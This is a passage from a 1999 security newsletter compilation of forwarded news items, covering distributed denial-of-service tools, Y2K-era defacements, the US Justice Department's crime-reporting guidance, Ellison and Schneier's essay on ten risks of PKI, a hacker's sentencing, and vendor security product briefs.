drone computers that do the attacking by flooding the target with
"packets" of information.
Compromised computers that can be infected with the attack software have
become a kind of currency, with attackers trading names and information
about them over Internet Relay Chat (IRC) discussions, Threatte said.
Threatte defended Packet Storm's philosophy of publishing attack software
for all to see. "If we don't make it available, there's no way you can
protect against these things," Threatte said. Sprint, for example,
recently called upon Packet Storm's information to more quickly fend off
an intruder.
Other, more dangerous versions of distributed attack software are
circulating, but Packet Storm doesn't have them, so they're harder to
detect, Threatte said.
Packet Storm, a five-person group based in Palo Alto, Calif., is no
stranger to controversy. It's now owned by security consultants
Kroll-O'Gara after being embroiled in a debate with its former home at
Harvard University and hacker chronicle site AntiOnline.
Threatte foresees a time when coordinated denial-of-service is more
serious. "Distributed attack tools right now are kind of in their
infancy," she said.
New improvements could involve a self-replicating "worm" version that
would automatically spread the attack software to new computers. After
several generations of spreading, the worm could erase itself from the
original computers used to launch the worm, severing ties with the true
origin. The worms could monitor several sites on the Internet for a sign
that triggers the time and target to attack.
ISN is sponsored by Security-Focus.COM
@HWA
32.0 [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "James J. Capone" <james@ptm.com>
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2413687,00.html
Groups ask others to take hiatus in response to government plea.
December 23, 1999
In a seemingly contradictory move, two hacking groups have defaced
websites to urge others to refrain from hacking over the New Year's
weekend. "... it is our hope that others will also abstain from defacing,
until the Y2K hysteria has settled down." -- message posted on defaced
website On Tuesday, a group using the handle Verb0 inserted this message
into several sites: "Stop hacking for one day, from 31th December 1999 to
1st January 2000." Online games site Echelon Entertainment was among those
hit, ZDNN reports
ISN is sponsored by Security-Focus.COM
@HWA
33.0 [ISN] How to report internet related crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Elias Levy <aleph1@SECURITYFOCUS.COM>
http://www.usdoj.gov/criminal/cybercrime/reporting.htm
Computer Crime and
Intellectual Property Section (CCIPS)
How to Report Internet-Related Crime
Internet-related crime, like any other crime, should be reported to
appropriate law enforcement investigative authorities at the local,
state, federal, or international levels, depending on the scope of
the crime. Citizens who are aware of federal crimes should report
them to local offices of federal law enforcement.
Some federal law enforcement agencies that investigate domestic
crime on the Internet include: the [1]Federal Bureau of
Investigation (FBI), the [2]United States Secret Service, the
[3]United States Customs Service, and the [4]Bureau of Alcohol,
Tobacco and Firearms (ATF). Each of these agencies has offices
conveniently located in every state to which crimes may be
reported. Contact information regarding these local office may be
found in local telephone directories. In general, federal crime
may be reported to the local office of an appropriate law
enforcement agency by a telephone call and by requesting the "Duty
Complaint Agent."
Each law enforcement agency also has a headquarters (HQ) in
Washington, D.C., which has agents who specialize in particular
areas. For example, the FBI and the U.S. Secret Service both have
headquarters-based specialists in computer intrusion (i.e.,
computer hacker) cases. In fact, the FBI HQ hosts an interagency
center, the [5]National Infrastructure Protection Center (NIPC),
created just to support investigations of computer intrusions. The
NIPCs general number for criminal investigations is 202-324-0303.
The U.S. Secret Services Electronic Crimes Branch may be reached at
202-435-5850. The FBI and the Customs Service also have
specialists in intellectual property crimes (i.e., copyright,
software, movie, or recording piracy, trademark counterfeiting).
Customs has a nationwide toll-free hotline for reporting at
800-BE-ALERT, or 800-232-2538.
The FBI investigates violations of federal criminal law generally.
Certain law enforcement agencies focus on particular kinds of
crime. Other federal agencies with investigative authority are the
[6]Federal Trade Commission and the [7]U.S. Securities and Exchange
Commission.
To determine some of the federal investigative law enforcement
agencies that may be appropriate for reporting certain kinds of
crime, please refer to the following table:
Type of Crime
Appropriate federal investigative law enforcement agencies
Computer intrusion (i.e. hacking) FBI local office; NIPC
(202-324-0303); U.S. Secret Service local office
Password trafficking FBI local office; NIPC (202-324-0303); U.S.
Secret Service local office
Copyright (software, movie, sound recording) piracy FBI local office;
if imported, U.S. Customs Service local office (800-BE-ALERT, or
800-232-2538)
Theft of trade secrets FBI local office
Trademark counterfeiting FBI local office; if imported, U.S. Customs
Service local office (800-BE-ALERT, or 800-232-2538)
Counterfeiting of currency U.S. Secret Service local office; FBI
local office
Child Pornography or Exploitation FBI local office; if imported, U.S.
Customs Service local office (800-BE-ALERT, or 800-232-2538)
Internet fraud FBI local office; Federal Trade Commission; if
securities fraud, Securities and Exchange Commission
Internet harassment FBI local office
Internet bomb threats FBI local office; ATF local office
Trafficking in explosive or incindiary devices or firearms over the
Internet FBI local office; ATF local office
Go to . . . [8]CCIPS home page || [9]Justice Department home page
_________________________________________________________________
Updated page May 21, 1999
ISN is sponsored by Security-Focus.COM
@HWA
34.0 [ISN] Ten risks of PKI (Public Key Infrastructure)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "R. A. Hettinga" <rah@shipwright.com>
Originally To: cryptography@c2.net,
Ten Risks of PKI: What You're not Being Told about Public Key
Infrastructure By Carl Ellison and Bruce Schneier
Computer security has been victim of the "year of the..." syndrome. First
it was firewalls, then intrusion detection systems, then VPNs, and now
certification authorities (CAs) and public-key infrastructure (PKI). "If
you only buy X," the sales pitch goes, "then you will be secure." But
reality is never that simple, and that is especially true with PKI.
Certificates provide an attractive business model. They cost almost
nothing to make, and if you can convince someone to buy a certificate each
year for $5, that times the population of the Internet is a big yearly
income. If you can convince someone to purchase a private CA and pay you
afee for every certificate he issues, you're also in good shape. It's no
wonder so many companies are trying to cash in on this potential
market.With that much money at stake, it is also no wonder that almost all
the literature and lobbying on the subject is produced by PKI vendors. And
this literature leaves some pretty basic questions unanswered: What good
are certificates anyway? Are they secure? For what? In this essay, we hope
to explore some of those questions.
Security is a chain; it's only as strong as the weakest link. The security
of any CA-based system is based on many links and they're not all
cryptographic. People are involved.
Does the system aid those people, confuse them or just ignore them? Does
it rely inappropriately on the honesty or thoroughness of people?
Computer systems are involved. Are those systems secure? These all work
together in an overall process. Is the process designed to maximize
security or just profit?
Each of these questions can indicate security risks that need to be
addressed.
Before we start: "Do we even need a PKI for e-commerce?" Open any article
on PKI in the popular or technical press and you're likely to find the
statement that a PKI is desperately needed for e-commerce to flourish.
This statement is patently false. E-commerce is already flourishing, and
there is no such PKI. Web sites are happy to take your order, whether or
not you have a certificate. Still, as with many other false statements,
there is a related true statement: commercial PKI desperately needs
e-commerce in order to flourish. In other words, PKI startups need the
claim of being essential to e- commerce in order to get investors.
There are risks in believing this popular falsehood. The immediate risk is
on the part of investors. The security risks are borne by anyone who
decides to actually use the product of a commercial PKI.
Risk #1: "Who do we trust, and for what?" There's a risk from an imprecise
use of the word "trust." A CA is often defined as "trusted."
In the cryptographic literature, this only means that it handles its own
private keys well. This doesn't mean you can necessarily trust a
certificate from that CA for a particular purpose: making a micropayment
or signing a million-dollar purchase order.
Who gave the CA the authority to grant such authorizations? Who made it
trusted?
A CA can do a superb job of writing a detailed Certificate Practice
Statement, or CPS � all the ones we've read disclaim all liability and any
meaning to the certificate � and then do a great job following that CPS,
but that doesn't mean you can trust a certificate for your application.
Many CAs sidestep the question of having no authority to delegate
authorizations by issuing ID certificates. Anyone can assign names. We
each do that all the time. This leaves the risk in the hands of the
verifier of the certificate, if he uses an ID certificate as if it implied
some kind of authorization.
There are those who even try to induce a PKI customer to do just that.
Their logic goes: (1) you have an ID certificate, (2) that gives you the
keyholder's name, (3) that means you know who the keyholder is, (4) that's
what you needed to know. Of course, that's not what you needed to know. In
addition, the logical links from 1 to 2, 2 to 3 and 3 to 4 are
individually flawed. [We leave finding those as an exercise for the
reader.]
Risk #2: "Who is using my key?"
One of the biggest risks in any CA-based system is with your own private
signing key. How do you protect it? You almost certainly don't own a
secure computing system with physical access controls, TEMPEST shielding,
"air wall" network security, and other protections; you store your
private key on a conventional computer. There, it's subject to attack by
viruses and other malicious programs. Even if your private key is safe on
your computer, is your computer in a locked room, with video surveillance,
so that you know no one but you ever uses it? If it's protected by a
password, how hard is it to guess that password? If your key is stored on
a smart card, how attack-resistant is the card? [Most are very weak.] If
it is stored in a truly attack-resistant device, can an infected driving
computer get the trustworthy device to sign something you didn't intend to
sign?
This matters mostly because of the term "non-repudiation." Like "trusted,"
this term is taken from the literature of academic cryptography. There it
means something very specific: that the digital-signature algorithm is not
breakable, so a third party cannot forge your signature. PKI vendors have
latched onto the term and used it in a legal sense, lobbying for laws to
the effect that if someone uses your private signing key, then you are not
allowed to repudiate the signature. In other words, under some digital
signature laws (e.g., Utah and Washington), if your signing key has been
certified by an approved CA, then you are responsible for whatever that
private key does. It does not matter who was at the computer keyboard or
what virus did the signing; you are legally responsible.
Contrast this with the practice regarding credit cards. Under mail-
order/telephone-order (MOTO) rules, if you object to a line item on your
credit card bill, you have the right to repudiate it � to say you didn't
buy that � and the merchant is required to prove that you did.
Risk #3: "How secure is the verifying computer?"
The previous section showed that the computer holding or driving the
private key needs to be secure. Long keys don't make up for an insecure
system because total security is weaker than the weakest component in the
system.
The same applies to the verifying computer - the one that uses the
certificate.
Certificate verification does not use a secret key, only public keys.
Therefore, there are no secrets to protect. However, it does use one or
more "root" public keys. If the attacker can add his own public key to
that list, then he can issue his own certificates, which will be treated
exactly like the legitimate certificates. They can even match legitimate
certificates in every other field except that they would contain a public
key of the attacker instead of the correct one.
It doesn't help to hold these root keys in "root certificates." Such a
certificate is self-signed and offers no increased security. The only
answer is to do all certificate verification on a computer system that is
invulnerable to penetration by hostile code or to physical tampering.
Risk #4: "Which John Robinson is he?"
Certificates generally associate a public key with a name, but few people
talk about how useful that association is. Imagine that you receive the
certificate of John Robinson. You may know only one John Robinson
personally, but how many does the CA know? How do you find out if the
particular John Robinson certificate you received is your friend's
certificate? You could have received his public key in person or verified
it in person (PGP allows this), but more likely you received a certificate
in e-mail and are simply trusting that it is the correct John Robinson.
The certificate's Common Name will probably be extended with some other
information, in order to make it unique among names issued by that one CA.
Do you know that other information about your friend? Do you know what CA
his certificate should come from?
When Diffie and Hellman introduced public-key cryptography, they proposed
a modified telephone directory in which you could find public keys.
Instead of name, address, and phone number, it would have name, address,
and public key. If you wanted to find John Robinson's public key you would
look him up in the directory, get his public key and send him a message
for his eyes only using that public key. This might have worked with the
Stanford Computer Science Department phone directory in 1976, but how many
John Robinsons are in the New York City phone book, much less in a
hypothetical phone book for the global Internet?
We grow up in small families where names work as identifiers. By the time
we're 5 years old, we know that lesson. Names work. That is false in the
bigger world, but things we learn as toddlers we never forget. In this
case, we need to think carefully about names and not blindly accept their
value by the 5-year-old's lessons locked into our memories.
Risk #5: "Is the CA an authority?"
The CA may be an authority on making certificates, but is it an authority
on what the certificate contains? For example, an SSL server certificate
contains two pieces of data of potential security interest: the name of
the keyholder (usually a corporate name) and the DNS name for the server.
There are authorities on DNS name assignments, but none of the SSL CAs
listed in the popular browsers is such an authority. That means that the
DNS name in the certificate is not an authoritative statement. There are
authorities on corporate names. These names need to be registered when one
gets a business license. However, none of the SSL CAs listed in the
browsers is such an authority. In addition, when some server holds an SSL
server certificate, it has permission to do SSL. Who granted the authority
to an SSL CA to control that permission? Is the control of that permission
even necessary? It serves an economic purpose (generating an income stream
for CAs) but does it serve a security purpose? What harm is done if an
uncertified server were allowed to use encryption? None.
Risk #6: "Is the user part of the security design?"
Does the application using certificates take the user into account or does
it concern itself only with cryptography?
For example, a normal user makes a decision of whether to shop with a
given SSL-protected Web page based on what is displayed on that page. The
certificate is not displayed and does not necessarily have a relation to
what is displayed. SSL security does not have the ability to control or
even react to the content of the Web page, only its DNS address. The
corporate name is not compared to anything the user sees and there are
some Web pages whose certificate is for a company that does Web hosting,
not for the company whose logo appears on the displayed page. Users can't,
and can't be expected to, sort this all out.
Risk #7: "Was it one CA or a CA plus a Registration Authority?"
Some CAs, in response to the fact that they are not authorities on the
certificate contents, have created a two-part certification structure: a
Registration Authority (RA), run by the authority on the contents, in
secure communication with the CA that just issues certificates. Other
vendors sell CA machinery directly to the content authority.
The RA+CA model is categorically less secure than a system with a CA at
the authority's desk. The RA+CA model allows some entity (the CA) that is
not an authority on the contents to forge a certificate with that
contents. Of course, the CA would sign a contract promising not to do so,
but that does not remove the capability. Meanwhile, since security of a
chain is weaker than the weakest link, the RA+CA is less secure than
either the RA or the CA, no matter how strong the CA or how good the
contract with the CA. Of course, the model with a CA at the authority's
desk (not at the vendor's site) violates some PKI vendors' business
models. It's harder to charge for certificates when you sell someone the
CA code (or they get it for free, as Open Source).
Risk #8: "How did the CA identify the certificate holder?"
Whether a certificate holds just an identifier or some specific
authorization, the CA needs to identify the applicant before issuing the
certificate.
There was a credit bureau that thought they would get into the CA
business.
After all, they had a vast database on people, so, the thinking ran, they
should be able to establish someone's identity online with ease. If you
want to establish identity online, you can do that provided you have a
shared secret with the subject and a secure channel over which to reveal
that secret. SSL provides the secure channel.
The trouble with a credit bureau serving this role is that in their vast
database there is not one secret shared with the subject. This is because
credit bureaus are in the business of selling their information to people
other than the subject. Worse, because credit bureaus do such a good job
at collecting and selling facts about people, others who might have
information about a subject are probably hard pressed to find any datum
shared with the subject that is not already available through some credit
bureau. This puts at risk commercial CAs that use credit bureau
information to verify identity on-line; the model just doesn't work.
Meanwhile, having identified the applicant somehow, how did the CA verify
that the applicant really controlled the private key corresponding to the
public key being certified? Some CAs don't even consider that to be part
of the application process. Others might demand that the applicant sign
some challenge right there on the spot, while the CA watches.
Risk #9: "How secure are the certificate practices?"
Certificates aren't like some magic security elixir, where you can just
add a drop to your system and it will become secure. Certificates must be
used properly if you want security. Are these practices designed with
solid security reasons, or are they just rituals or imitations of the
behavior of someone else? Many such practices and even parts of some
standards are just imitations which, when carefully traced back, started
out as arbitrary choices by people who didn't try to get a real answer.
How is key lifetime computed? Does the vendor use 1 year, just because
that's common? A key has a cryptographic lifetime. It also has a theft
lifetime, as a function of the vulnerability of the subsystem storing it,
the rate of physical and network exposure, attractiveness of the key to an
attacker, etc. From these, one can compute the probability of loss of key
as a function of time and usage. Does the vendor do that computation? What
probability threshold is used to consider a key invalid?
Does the vendor support certificate or key revocation? Certificate
Revocation Lists (CRLs) are built into some certificate standards, but
many implementations avoid them because they seem to be archaic remnants
of the newsprint booklets of bad checking account numbers one used to find
at the supermarket checkout stand. Like those booklets, CRLs are seen as
too big and too outdated to be relevant. However, if CRLs are not used,
how is revocation handled?
If revocation is handled, how is compromise of a key detected in order to
trigger that revocation? Can revocation be retroactive? That is, can a
certificate holder deny having made some signature in the past? If so,
are signatures dated so that one knows good signatures from suspect ones?
Is that dating done by a secure timestamp service?
How long are the generated public keys and why was that length chosen?
Does the vendor support 512-bit RSA keys just because they're fast or
2048-bit keys because someone over there in the corner said he thought it
was secure?
Does the proper use of these certificates require user actions? Do users
perform those actions? For example, when you establish an SSL connection
with your browser, there's a visual indication that the SSL protocol
worked and the link is encrypted. But who are you talking securely with?
Unless you take the time to read the certificate that you received, you
don't know.
Even then, you may not know (cf., Risk #4, above) but if you don't even
look, it's much like going into a private room with the lights off: you
might know that someone else is there and your conversation is private,
but until you know who that other person is, you shouldn't reveal any
secret information.
Risk #10: "Why are we using the CA process, anyway?"
One PKI vendor employee confided in us a few years ago that they had great
success selling their PKI solution, but that customers were still unhappy.
After the CA was installed and all employees had been issued certificates,
the customer turned to the PKI vendor and asked, "OK, how do we do single
sign-on?" The answer was, "You don't. That requires a massive change in
the underlying system software."
Single Sign-On (SSO) might be the killer app of PKI. Under SSO, you come
into work in the morning, plug in your smart-card, enter the PIN that
activates it, and for the rest of the day, you don't have to do any more
logins. All of that is handled for you by the SSO mechanism.
Attractive isn't it? Of course, it's attractive. Authentication is a pain.
Anything we can do to avoid it, we'll jump at.
Unfortunately, the security value of authentication is all but completely
defeated by SSO. Authentication is supposed to prove that the user is
present at the controlling computer, at the time of the test. Under SSO,
when the user has to rush to the washroom, any passing person can walk up
to that user's computer and sign on someplace via the SSO mechanism.
So, why are so many jumping at the CA process with such fervor? Do they
use certificates out of empty ritual, just because the other guy does and
it's the thing to do this year? Do they do it in order to pass the
liability buck: to be able to blame the PKI experts if any insecurity
sneaks through?
We are not that cynical. Our assessment is that security is very
difficult, both to understand and to implement. Busy system administrators
and IT managers don't have the time to really understand security. They
read the trade press. The trade press, influenced by PKI vendors, sings
the praises of PKIs. And PKI vendors know what busy people need: a
minimal-impact solution. "Here, buy this one thing and it will make you
secure." So that's what they offer. Reality falls far short of this
promise, but then, this is a business and the prominent voices are those
with something to sell. Caveat emptor.
Bruce Schneier is the author of Applied Cryptography, the Blowfish and
Twofish encryption algorithms, and dozens of research papers and articles
on cryptography and computer security. He is CTO of Counterpane Internet
Security, Inc., a managed security service company offering leading-edge
expertise in the fields of intrusion detection and prevention, preemptive
threat discovery, forensic research, and organizational IT systems
analysis.
You can subscribe to his free monthly e-mail newsletter, Crypto-Gram, at
http://www.counterpane.com
Carl M. Ellison is a Senior Security Architect for Intel Corporation, with
special focus on cryptography, cryptographic access control and public key
certificates. Prior to the focus on cryptography, his earlier professional
computer science career focused on system design with special emphasis on
distributed and networked systems.
ISN is sponsored by Security-Focus.COM
@HWA
35.0 [ISN] Forbes says he'll ditch all crypto export controls
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Declan McCullagh <declan@well.com>
http://www.wired.com/news/politics/0,1283,33049,00.html
Forbes, the Privacy Candidate
by Declan McCullagh (declan@wired.com)
11:40 a.m. 17.Dec.1999 PST
WASHINGTON -- If you're the kind of
person who frets about ever-eroding
privacy rights, Steve Forbes wants to be
your president.
In the first campaign speech by any
presidential candidate on the topic, the
publishing luminary left nothing to the
imagination: Voracious databases know
more about you than your mother does,
and the Clinton administration is
particularly to blame.
"Bit by bit, day by day, we are being
seduced by politicians promising security
as they take away our sovereignty,
promising prosperity as they gnaw away
at our privacy," Forbes told a crowd at
the conservative Free Congress
Foundation on Thursday afternoon.
Hearing someone grouse about Bill Clinton
and Al Gore at a Free Congress
Foundation event is about as remarkable
as a Macy's post-holiday sale, but Forbes'
plan to muzzle federal infocrats is one
that even the ACLU can cheer.
[...]
Much of Forbes' speech was devoted to
how the executive branch is "engaged in
the greatest assault" on privacy in the
history of the United States, a claim the
Clinton administration dismissed on Friday
as campaign hyperbole.
[...]
ISN is sponsored by Security-Focus.COM
@HWA
36.0 [ISN] Zyklon claims his crime was "no big deal"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.techserver.com/noframes/story/0,2294,500060584-500100049-500415296-0,00.html
WASHINGTON (November 22, 1999 8:10 p.m. EST http://www.nandotimes.com)
- At age 19, hacker Eric Burns has already wandered the underpinnings
of the Web where few had gone before, including an illicit visit
inside computers at the White House in May.
"I didn't really think it was too much of a big deal," said Burns -
hacker name Zyklon - who admitted responsibility for some of the most
sensational attacks on corporate and government Internet sites.
Burns pleaded guilty Friday in U.S. District Court in Alexandria, Va.,
to a single felony count of intentionally hacking into one computer,
but admitted involvement in the spate of electronic assaults.
Now Burns is facing 15 months in federal prison and $36,240 in
restitution. And under a judge's orders last week, he won't be allowed
to touch a computer for three years after his release.
Burns was initially indicted May 13 on charges of breaking into
computers for the U.S. Information Agency and two businesses. That was
four days after the White House Internet site - at www.whitehouse.gov
- was electronically assaulted.
Initially, Burns said he wasn't directly involved in that White House
attack in which the altered site included the phrase, "following peeps
get some shouts" - hacker slang for "hello" - and listed a dozen
names, including Zyklon.
Zyklon is the name of a poison gas used by Nazis against Jews.
But federal prosecutors said Burns boasted of the White House attack
online even before it happened, and Burns admitted at his sentencing
Friday he was among three people who altered the site briefly to show
a black Web page with the names of hacker organizations, along with
messages, "Your box was own3d," and, "Stop all the war."
He said Monday in a telephone interview from his home in Shorewood,
Wash., that he will refuse to identify his two partners to the Secret
Service, partly because he believes the criminal penalties for hackers
are too steep. His punishment didn't fit his crime, he insisted.
"I'd rather not have what happened to me happen to anyone else," Burns
said. "I don't really agree with the kind of sentencing range there is
for the crime."
The seriousness of the trouble facing Burns didn't sink in, he
admitted, even after FBI agents raided his home and took his computer.
"I just gave them a confession," Burns said. "I didn't think it was
too big a deal."
Prosecutors indicated otherwise.
U.S. Attorney Helen Fahey said Burns attacked computers on the
Internet controlling Web sites for NATO, a U.S. embassy and consulates
and even Vice President Al Gore. The USIA Web site was shut down for
eight days after Burns' attack.
All told, the attacks cost the government and businesses more than
$40,000, prosecutors said.
When the White House site was vandalized, experts "had to shut down
the Web server, disconnect both the public and private computer
networks from the Internet for two days and reconfigure the computer
system," Fahey said in a statement.
Burns expects to report to federal prison in four to six weeks, which
he hopes will let him spend Thanksgiving and the holidays with his
family. With time off for good behavior, his lawyer told him he might
spend as few as 13 months behind bars.
Although his sentence says he won't be allowed to use a computer
during three years of supervised probation when he's released, he's
already planning to ask his probation officer whether he'll be allowed
to use one for work.
"I really don't know" how the arrest and time in prison will affect
his future, Burns said. "Hopefully, it won't impact it too bad."
==
Some day, on the corporate balance sheet, there will be
an entry which reads, "Information"; for in most cases
the information is more valuable than the hardware which
processes it. -- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/
ISN is sponsored by Security-Focus.COM
@HWA
37.0 [ISN] Security Wire Digest Volume 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: infosecurity@emailch.com
SECURITY WIRE DIGEST, VOL. 1, NO. 8, NOV. 22, 1999
Security Wire Digest is a weekly e-mail newsletter
brought to you by Information Security magazine, an
ICSA.net publication.
TO UNSUBSCRIBE, REFER TO THE INSTRUCTIONS AT THE END OF
THIS MESSAGE.
=====================================================
CONTENTS
**THANKSGIVING NOTICE**
1. INFOSEC WEEK IN REVIEW
*Enterprise Security Management a Hot Topic at CSI
2. INDUSTRY BRIEFS
*HP VirtualVault 4.0 Goes Mainstream
*eNABLE Supports Rainbow and RSA
*Celo Debuts CeloCom VPN Suite
*RSA Joins Trusted Computing Platform Alliance
*Entegrity Partners With Identrus
*Schlumberger Introduces Easyflex Corporate
*Identix BioLogon Available Online
*Tumbleweed Acquires Worldtalk
3. HAPPENINGS
4. SECURITY PERSPECTIVES
*Exposing Hacking With Hacking Exposed
By Ben Rothke
=====================================================
THIS ISSUE OF SECURITY WIRE DIGEST IS SPONSORED BY...
Agilent Technology SFProtect NT Security Scanner
SFProtect NT Security Scanner is the ONE software
solution that empowers you to find and fix NT
vulnerabilities with one single application. How?
SFProtect scans the NT operation system, IIS and SQL
version 6.5 and 7.0 for security vulnerabilities. Once
identified, problems can be fixed with SFProtect's unique
Intellifix feature. You can also get e-mail notification
of audit results, reports in HTML, remote operation
through a secure ODBC link and more.
Download your free trial version today:
http://www.agilent.com/comms/netsecurity9
=====================================================
**THANKSGIVING NOTICE**
Security Wire Digest will take a one-issue hiatus next
week due to U.S. Thanksgiving festivities. The next
Security Wire Digest will be delivered on Monday, Dec.
6.
=====================================================
1. INFOSEC WEEK IN REVIEW
*ENTERPRISE SECURITY ADMINISTRATION A HOT TOPIC AT CSI
Easing the burdens of security administration is on the
minds of lots of security practitioners these days. As
organizations introduce new technologies and services to
network infrastructures, security admins and managers are
faced with the complex task of not only finding and
fixing new vulnerabilities before they are exploited, but
identifying and responding to breaches after they've
already occurred.
Last week at CSI's annual security conference, a number
of vendors introduced new tools and enhancements to
existing products that respond to this need by
automating, centralizing and simplifying the task of
enterprise risk management and intrusion response.
BindView Development Corp. (http://www.bindview.corp)
announced version 2.0 of its HackerShield software, an
enterprise vulnerability scanner that allows operators to
find and close security holes in servers, workstations
and network devices across a heterogeneous network.
Available in December, version 2.0 is engineered with the
increasing number of security newbies in mind; while its
database of vulnerability scripts is as extensive as that
of other enterprise-class scanners, the tool deploys fast
and is easy to configure and use. It includes a handy
Scan Wizard that walks new users through the first-time
scanning process, and when a vulnerability or breach is
identified, it uses plain language to spell out the
degree of risk and appropriate response procedures.
BMC Software (http://www.bmc.com) rolled out an
enhancement to its CONTROL-SA security suite that extends
the reach of its centralized management offering.
CONTROL-SA/Links allows admins and managers to create
event definitions and automated rulesets for disparate
parts of the enterprise network. For instance, security
managers can integrate human resource applications within
the security administration process. If a new employee
joins the organization, CONTROL-SA/Links can be directed
to intercept certain HR transactions and automatically
initiate end-user rights for the new employee.
By year-end, newcomer e-Security
(http://www.esecurityinc.com) plans to introduce a
"Management Desk" to its Open e-Security Platform (OeSP)
to help operators respond to identified security
breaches. OeSP's competitive differentiator is that it
consolidates reports of security "exceptions" in
real-time from fragmented security products -- no matter
the product brand. When the central console receives
notice of an intrusion, the Management Desk will
automatically generate a step-by-step response outline
according to the organization's predefined security
policy, contact appropriate personnel and monitor
security response procedures.
Version 5.5 of Network Associates's (http://www.nai.com)
CyberCop vulnerability scanner also automates several
administrative tasks. Its AutoFix feature automatically
repairs more than 700 identified network, protocol and
application vulnerabilities, and its AutoUpdate feature
lets admins update the scanning engine and vulnerability
database on a regular, automatic basis.
Computer Associates (http://www.cai.com) announced an
access control enhancement to its eTrust family of
security tools. With the simultaneous release of eTrust
Access Control 5.0 for UNIX and eTrust Access Control 4.1
for NT, CA provides users with a centralized system for
creating, distributing and managing access. The tools
also operate within CA's flagship enterprise management
system, Unicenter TNG.
Finally, BullSoft (http://www.bullsoft.com) announced
that it has integrated storage management capabilities
into its OpenMaster secure e-infrastructure and
enterprise management software. The added capability
allows organizations to select and configure
best-of-breed Internet and enterprise-wide storage
resources, and manage all them from a centralized
OpenMaster console.OpenMaster storage management
configuration starts at $18,900, which includes core
services such as network monitoring, alarm management and
network discovery.
=====================================================
2. INDUSTRY BRIEFS
*HP VIRTUALVAULT 4.0 GOES MAINSTREAM
Hewlett-Packard last week announced major enhancements
and new pricing to its Praesidium VirtualVault 4.0
trusted Web-server platform. The latest version of
VirtualVault provides application-level protection for
such b-to-b applications as SAP, Oracle and Ariba; and
supports a broader range of enterprise server platforms,
including Sun, Microsoft, Compaq and IBM. Optional BMC
Software Patrol SafePassage for VirtualVault simplifies
the deployment of secure extranets. Entry-level price for
VirtualVault is now $17,500.
http://www.hp.com/security
*eNABLE SUPPORTS RAINBOW AND RSA
eNABLE Solutions and Rainbow Technologies will develop
an integrated solution that combines enRole, eNABLE's
e-business access management system, with iKey, Rainbow's
USB authentication device, providing end-users with
two-factor hardware authentication in a scalable
solution. In related news, eNABLE announced that it has
enhanced enRole to provide support for RSA ACE/Server
authentication management software from RSA Security.
http://www.enablesolutions.com
http://www.rainbow.com
http://www.rsasecurity.com
*CELO DEBUTS CELOCOM VPN SUITE
Fully integrated with Celo Communications's PKI
technology, the CeloCom VPN suite offers authentication,
encryption and full X.509 and LDAP compliance. The suite
can be integrated into existing networks and can
interoperate with other VPN products, certificate
management systems, smart cards and readers, and LDAP
directory services. The suite is comprised of four
CeloCom products: CeloCom Secure remote access, CeloCom
RVPN and CeloCom LVPN remote VPN clients, and CeloCom
GateKeeper remote access server.
http://www.celocom.com
*RSA JOINS TRUSTED COMPUTING PLATFORM ALLIANCE
RSA Security Inc. joined the Trusted Computing Platform
Alliance (TCPA), an industry group whose goal is to
establish a new hardware and software specification that
technology companies can use to offer more trusted and
secure personal computers for conducting e-business. RSA
Security will work alongside founding members Compaq, HP,
IBM, Intel and Microsoft to simplify the RSA deployment,
use and manageability of SecurID technologies by
enhancing and standardizing security at the level of the
platform hardware, BIOS and operating system.
http://www.rsasecurity.com
*ENTEGRITY PARTNERS WITH IDENTRUS
Secure e-business applications provider Entegrity
Solutions has announced an agreement with the Identrus
alliance to develop enterprise-ready solutions based on
the Identrus trust model that meet Identrus
specifications for global e-commerce interoperability and
security. Using cryptography and PKI technology,
Entegrity will work with Identrus-member financial
institutions and solution providers to "trust-enable"
standard, legacy and custom applications used for b-to-b
e-commerce. Identrus members now represent 11 global
financial institutions in more than 100 countries with
more than 8 million business relationships.
http://www.entegrity.com
http://www.identrus.com
*SCHLUMBERGER INTRODUCES EASYFLEX CORPORATE
In order to meet the growing security concerns of the
corporate market, Schlumberger has introduced Easyflex
Corporate, a new dual-interface contact/contactless smart
card that facilitates secure access to the real and
virtual desktop. The card controls physical access to
offices, buildings and parking lots through its
contactless interface, as well as logical access to
computers, servers and networks through its secure
contact interface.
http://www.smartcards.com
*IDENTIX BIOLOGON AVAILABLE ONLINE
Biometric security provider Identix last week made its
BioLogon network security fingerprint identification
software and hardware available as a new product at
Beyond.com's Web site. Visitors to Beyond.com can
download the BioLogon fingerprint identification suite,
and obtain biometric hardware readers in multiple
options.
http://www.beyond.com
http://www.identix.com
*TUMBLEWEED ACQUIRES WORLDTALK
Secure messaging provider Tumbleweed Communications
Corp. last week announced a definitive agreement to
acquire Worldtalk Corp. When combined with Worldtalk's
WorldSecure e-mail content filtering products,
Tumbleweed's Integrated Messaging Exchange (IME) will
enable customers to centrally define and enforce policies
that drive new traffic across IME. Worldtalk will become
a wholly owned subsidiary of Tumbleweed. The transaction
is expected to close in the first quarter of 2000. Terms
were not released.
http://www.tumbleweed.com
http://www.worldtalk.com
=====================================================
3. HAPPENINGS
Cards on the 'Net -- Smart Cards and ID Technology:
Unlocking the Commercial Potential of the Web
Tu-Th, Nov. 30-Dec. 2, San Francisco, Calif.
http://www.ctst.com
DECEMBER
IT Solutions & Information Assurance Conference
W, Dec. 1, Los Angeles, Calif.
W & Th, Dec. 8 & 9, Colorado Springs, Colo.
http://www.technologyforums.com
18th Annual Data Center Conference: Taking the Data
Center to E-business and Beyond
W-F, Dec. 1-3, Orlando, Fla.
http://www.gartner.com
15th Annual Computer Security
Applications Conference
M-F, Dec. 6-10, Phoenix, Ariz.
http://www.acsac.org
Web and Intranet Security
T-Th, Dec. 7-9 Orlando, Fla.
http://www.misti.com
Web and Intranet Security
T-Th, Dec. 7-9 Orlando, Fla.
http://www.misti.com
SANS Security San Francisco
